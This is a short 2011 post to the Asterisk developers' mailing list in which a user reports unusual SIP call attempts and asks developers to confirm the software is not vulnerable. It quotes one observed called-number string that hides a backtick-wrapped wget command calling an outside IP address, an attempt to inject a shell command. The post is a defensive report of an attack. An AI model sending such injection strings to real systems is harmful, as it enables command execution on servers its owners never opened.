[asterisk-dev] A new kind of SIP attack ?
Pavel Troller
patrol at sinus.cz
Mon Sep 12 03:39:33 CDT 2011
Hi!
Since yesterday, I can see strange "call attempts" coming to my
switches over SIP to destinations like this:
00123456789000`wget\x20-O\x20/dev/null\x20http://91.223.89.94/V.php`
I tried to wget the file manually and it was successful, but it was
empty (zero size).
I'm just informing about something which may be a new kind of hacking
attempt. I hope that Asterisk doesn't perform backtick expansion during
processing of the called number, but I'm writing it there to be sure
that a developer's eye will look at this and confirm it.
With regards,
Pavel Troller
More information about the asterisk-dev
mailing list